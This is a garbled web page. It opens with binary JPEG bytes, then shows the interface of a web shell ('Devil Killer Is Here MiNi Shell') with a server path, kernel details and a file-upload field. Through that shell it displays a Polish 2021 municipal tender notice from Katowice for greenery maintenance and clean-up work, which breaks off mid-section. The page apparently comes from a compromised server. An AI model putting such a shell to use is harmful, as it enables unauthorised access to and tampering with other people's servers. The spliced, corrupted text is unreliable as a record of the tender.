JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210818/0015261801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonywanie prac interwencyjnych na terenach miejskich i w pasach drogowych miasta Katowice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD ZIELENI MIEJSKIEJ W KATOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003545711</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 138</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-523</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">322517751</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@zzm.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zzmkce.bip.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonywanie prac interwencyjnych na terenach miejskich i w pasach drogowych miasta Katowice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8b84555b-fff8-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00152618</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008519/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Prace interwencyjne na terenie miasta Katowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zzm <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/zzm</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z Rozdziałem 8 SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://portal.smartpzp.pl/zzm</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">tak</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">brak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NZI.261.9.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Wykonywanie prac interwencyjnych na terenach miejskich, w tym:<br/>1)Oczyszczanie terenów z resztek budowlanych, gruzu i ziemi - zebranie i wywóz odpadów wraz z ich zagospodarowaniem.<br/>2)Oczyszczanie terenów z zalegających odpadów komunalnych - zebranie i wywóz odpadów wraz z ich zagospodarowaniem.<br/>3)Oczyszczanie terenów z zalegających odpadów ulegających biodegradacji (liście, gałęzie, trawa) - zebranie i wywóz powstałych odpadów wraz z ich zagospodarowaniem.<br/>4)Karczowanie zagajników, skupin krzewów oraz drzew<br/>niewymagających zezwolenia na usunięcie. <br/>5)Chemiczne zwalczanie Barszczu Sosnowskiego – oprysk, wykoszenie, zebranie i wywiezienie powstałych odpadów wraz z zagospodarowaniem.<br/>6)Pielęgnację zieleni wysokiej – przycięcie drzew w celu utrzymania skrajni wraz z zebraniem i wywiezieniem powstałych odpadów.<br/>7)Pielęgnację zieleni wysokiej – cięcie pielęgnacyjne w koronie drzew, w tym przy użyciu zwyżki, w zakresie przewidzianym art. 87a ustawy o ochronie przyrody - zebranie i wywiezienie powstałych odpadów.<br/>8)Usuwanie odrostów drzew oraz samosiewów wraz z zebraniem i wywiezieniem powstałych odpadów.<br/>9)Przycięcie skupin krzewów w celu odmłodzenia wraz z zebraniem i wywiezieniem powstałych odpadów.<br/>10)Przycinanie krzewów żywopłotowych z trzech stron wraz z zebraniem i wywiezieniem powstałych odpadów.<br/>11)Odchwaszczanie skupin krzewów wraz z załadunkiem, transportem i przekazaniem odpadów do utylizacji bezpośrednio po zakończeniu prac (wraz z kosztami utylizacji).<br/>12)Uprzątnięcie złomów i wywrotów wraz z frezowaniem pnia, zebraniem i wywiezieniem powstałych odpadów.<br/>13)Koszenie trawników z wygrabieniem i wywiezieniem pokosu wraz z ich zagospodarowaniem.<br/>14)Wyrównywanie terenu wraz z wysiewem trawy na uporządkowanych terenach.<br/>15)Usunięcie darni i chwastów z chodników (z wywozem i zagospodarowaniem powstałych odpadów). <br/>16)Zamiatanie dróg parkowych, nawierzchni utwardzonych (alejki, ścieżki, schody itp.).<br/>17)Utrzymanie zimowe: odśnieżanie nawierzchni utwardzonych, posypywanie piaskiem lub grysem oblodzonych nawierzchni utwardzonych wraz z wywiezieniem.<br/>18)Wygrabienie liści wraz z zebraniem, wywozem i ich zagospodarowaniem.<br/>19)Opróżnianie koszy betonowych i na psie odchody na terenach miejskich.<br/>20)Odchwaszczanie rabat kwiatowych wraz z załadunkiem, transportem i przekazaniem odpadów do utylizacji bezpośrednio po zakończeniu prac (wraz z kosztami utylizacji).<br/>21)Interwencyjne podlewanie krzewów oraz roślin rabatowych.<br/>22)Usunięcie nośników reklamowych - usuwanie różnego typu naklejek np. reklam, ogłoszeń i plakatów z elementów wyposażenia terenu (słupów oświetleniowych, ławek, koszy, tablic informacyjnych, słupków, urządzeń zabawowych i gimnastycznych, ogrodzeń itp.),usuwanie różnego rodzaju folii, sznurów, pasów oraz plakatów, ogłoszeń, reklamówek z pni oraz z koron drzew i krzewów,<br/>23)Usunięcie wielkoformatowych nośników reklamowych - tablice reklamowe, billboardy wraz z konstrukcjami nośnymi.<br/>24)Oczyszczenie betonowego słupa ogłoszeniowego.<br/>2.	Każda z w/w usług będzie zlecana odrębnie zgodnie z potrzebami Zamawiającego.<br/>3. TERMIN WYKONYWANIA PRAC dla Części 1: od dnia podpisania umowy do 31 grudnia 2023 roku z możliwością przedłużenia albo skrócenia terminu realizacji umowy do wyczerpania kwoty przeznaczonej na realizację umowy.<br/>4. Wartość zamówienia została wskazana w projekcie umowy (Załącznik Nr 1B do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77300000-3 - Usługi ogrodnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">77311000-3 - Usługi utrzymania ogródków ozdobnych</p> <p class="mb-0">77312000-0 - Usługi usuwania chwastów</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <p class="mb-0">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</p> <p class="mb-0">90511300-5 - Usługi zbierania śmieci</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90600000-3 - Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybiera najkorzystniejszą ofertę dla każdej części osobno.<br/>2.	Zamawiający oceni i porówna oferty złożone przez Wykonawców niewykluczonych z udziału w postępowaniu i niepodlegające odrzuceniu na podstawie art. 226 ust 1 ustawy Pzp. Oferty oceniane będą w oparciu o zasady i kryteria zawarte w niniejszej SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Norma emisji spalin EURO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Wykonywanie prac interwencyjnych w pasach drogowych w zakresie zgodnym z opisem przedmiotu zamówienia, w tym:<br/>1)Oczyszczanie terenów z resztek budowlanych, gruzu, ziemi - zebranie i wywóz odpadów wraz z ich zagospodarowaniem.<br/>2)Oczyszczanie terenów z zalegających odpadów komunalnych - zebranie i wywóz odpadów wraz z ich zagospodarowaniem.<br/>3)Oczyszczanie terenów z zalegających odpadów ulegających biodegradacji (liście, gałęzie, trawa) - zebranie i wywóz powstałych odpadów wraz z ich zagospodarowaniem.<br/>4)Karczowanie krzewów i drzew niewymagających zezwolenia na usunięcie, zebranie i wywiezienie powstałych odpadów wraz z zagospodarowaniem.<br/>5)Pielęgnację zieleni wysokiej – przycięcie drzew w celu utrzymania skrajni wraz z zebraniem i wywiezieniem powstałych odpadów.<br/>6)Pielęgnację zieleni wysokiej – cięcie pielęgnacyjne w koronie drzew, w tym przy użyciu zwyżki, w zakresie przewidzianym art. 87a ustawy o ochronie przyrody) - zebranie i wywiezienie powstałych odpadów.<br/>7)Cięcia techniczne polegające na odsłonięciu latarni oświetlenia ulicznego.<br/>8)Usuwanie odrostów drzew w pasach drogowych wraz z zebraniem i wywiezieniem powstałych odpadów.<br/>9)Przycinanie skupin krzewów w celu odmłodzenia wraz z zebraniem i wywiezieniem powstałych odpadów.<br/>10)Przycinanie krzewów żywopłotowych z trzech stron wraz z zebraniem i wywiezieniem powstałych odpadów.<br/>11)Odchwaszczanie skupin krzewów wraz z załadunkiem, transportem i przekazaniem odpadów do utylizacji bezpośrednio po zakończeniu prac (wraz z kosztami utylizacji).<br/>12)Uprzątnięcie złomów i wywrotów wraz z frezowaniem pnia zebraniem i wywiezieniem powstałych odpadów.<br/>13)Koszenie trawników z wygrabieniem i wywiezieniem pokosu wraz z ich zagospodarowaniem.<br/>14)Wyrównywanie terenu wraz z wysiewem trawy na uporządkowanych terenach.<br/>15)Usunięcie darni z chodników z wywozem i zagospodarowaniem powstałych odpadów<br/>16)Zamiatanie nawierzchni utwardzonych. <br/>17)Utrzymanie zimowe: odśnieżanie nawierzchni utwardzonych, posypywanie piaskiem lub grysem oblodzonych nawierzchni utwardzonych wraz z wywiezieniem.<br/>18)Wygrabienie liści wraz z zebraniem, wywozem i zagospodarowaniem.<br/>19)Opróżnianie koszy przyulicznych.<br/>20)Odchwaszczanie rabat kwiatowych wraz z załadunkiem, transportem i przekazaniem odpadów do utylizacji bezpośrednio po zakończeniu prac (wraz z kosztami utylizacji).<br/>21)Interwencyjne podlewanie krzewów oraz roślin rabatowych.<br/>22)Odchwaszczanie chodników z wrastającej zieleni poprzez oprysk środkami chwastobójczymi biodegradowalnymi wraz z usunięciem pozostałości uschniętych roślin oraz darni.<br/>23)Oczyszczanie przyczółków i stożków tworzących infrastrukturę drogową przy mostach z wrastającej zieleni, darni, odpadów komunalnych oraz samosiewów wraz z zebraniem, wywozem i zagospodarowaniem.<br/>2. Każda z w/w usług będzie zlecana odrębnie zgodnie z potrzebami Zamawiającego.<br/>3. TERMIN WYKONYWANIA PRAC dla Części 2: od dnia podpisania umowy do 31.12.2023 roku z możliwością przedłużenia albo skrócenia terminu realizacji umowy do wyczerpania kwoty przeznaczonej na realizację umowy.<br/>4. Wartość zamówienia została wskazana w projekcie umowy (Załącznik Nr 2B do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77300000-3 - Usługi ogrodnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">77311000-3 - Usługi utrzymania ogródków ozdobnych</p> <p class="mb-0">77312100-1 - Usługi odchwaszczania</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <p class="mb-0">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</p> <p class="mb-0">90511300-5 - Usługi zbierania śmieci</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90600000-3 - Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybiera najkorzystniejszą ofertę dla każdej części osobno.<br/>2.	Zamawiający oceni i porówna oferty złożone przez Wykonawców niewykluczonych z udziału w postępowaniu i niepodlegające odrzuceniu na podstawie art. 226 ust 1 ustawy Pzp. Oferty oceniane będą w oparciu o zasady i kryteria zawarte w niniejszej SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Norma emisji spalin EURO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>2.1.	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, <br/>2.2.	sytuacji ekonomicznej lub finansowej,<br/>2.3.	zdolności technicznej lub zawodowej<br/>- określone przez Zamawiającego w ogłoszeniu o zamówieniu i SWZ.<br/>3.	Określenie warunków udziału w postępowaniu: <br/>3.1.	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Części 1 - 2:<br/>Wykonawca powinien spełniać wymogi dotyczące transportu (wywozu) na podstawie aktualnej ustawy o odpadach.<br/>3.2.	sytuacja ekonomiczna lub finansowa:<br/>Części 1 - 2:<br/>Wykonawca spełni ten warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę min. 100.000,00 PLN dla jednej części.<br/><br/>3.3.	zdolność techniczna lub zawodowa:<br/>A. Część 1<br/>a)	zdolność zawodowa - Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 2 usługi, w tym:<br/>-	jedna polegająca na wykonaniu zewnętrznych prac porządkowo-czystościowych o wartości co najmniej 50 000,00 złotych<br/>-	druga polegająca na pielęgnacji zieleni o wartości co najmniej 50 000,00 złotych<br/><br/>b)	zdolność techniczna - wykonawca spełni warunek, jeżeli wykaże, że dysponuje lub będzie dysponował następującym wyposażeniem w celu wykonania zamówienia wraz z informacją <br/>o podstawie do dysponowania tymi zasobami:<br/>•	ciągnik wraz z kosiarką bijakową - w ilości minimum 2 szt.,<br/>•	kosy spalinowe - w ilości minimum 6 szt.,<br/>•	kosiarki mechaniczne (spalinowe samojezdne) – w ilości minimum 6 szt.,<br/>•	pilarki spalinowe - w ilości minimum 2 szt.<br/>•	środki transportowe do wywozu traw i odpadów - 4 szt. (pojazdy o ładowności od 700 kg do 3,5 t lub większej),<br/>•	beczkowóz do podlewania – 1 szt.,<br/>•	opryskiwacz ręczny – 4 szt.,<br/>•	rębak do gałęzi – 1 szt.,<br/>•	urządzenie zabezpieczenia ruchu drogowego - tablica zamykająca „U-26a” ze strzałą „22” lampową halogenową lub LED: wolnostojącą lub na pojazdy i przyczepy – 1 szt.<br/>Wszystkie pojazdy muszą spełniać normę emisji spalin co najmniej EURO 5.<br/>O ile z obowiązujących przepisów prawa wynikać będzie obowiązek wykonywania umowy z wykorzystaniem pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym, Wykonawca zapewni, aby ich udział we flocie pojazdów użytkowanych przy wykonywaniu tego zadania wynosił co najmniej 10%, chyba, że z przepisów wynikać będzie większy udział procentowy.<br/>c)	kwalifikacje zawodowe i uprawnienia osób skierowanych przez Wykonawcę do realizacji zamówienia Wykonawca spełni warunek jeżeli wykaże, że dysponuje co najmniej 10 osobami, w tym:<br/>-	dwie osoby o wykształceniu ogrodniczym lub pokrewnym z min. 3-letnim stażem pracy przy pracach związanych z pielęgnacją drzew, karczowaniem zagajników i zakładaniem trawników <br/>(w usługach ogrodniczych) i innymi czynnościami wskazanymi w opisie przedmiotu zamówienia,<br/>-	dwie osoby posiadające uprawnienia do kierowania ruchem drogowym dla osób wykonujących roboty przy drodze,<br/>-	jeden pracownik z ukończonym kursem, szkoleniem lub szkołą w zakresie stosowania środków ochrony roślin,<br/>-	dwie osoby z uprawnieniami pilarza,<br/>-	trzech pracowników fizycznych.<br/><br/>B. Część 2<br/>a)	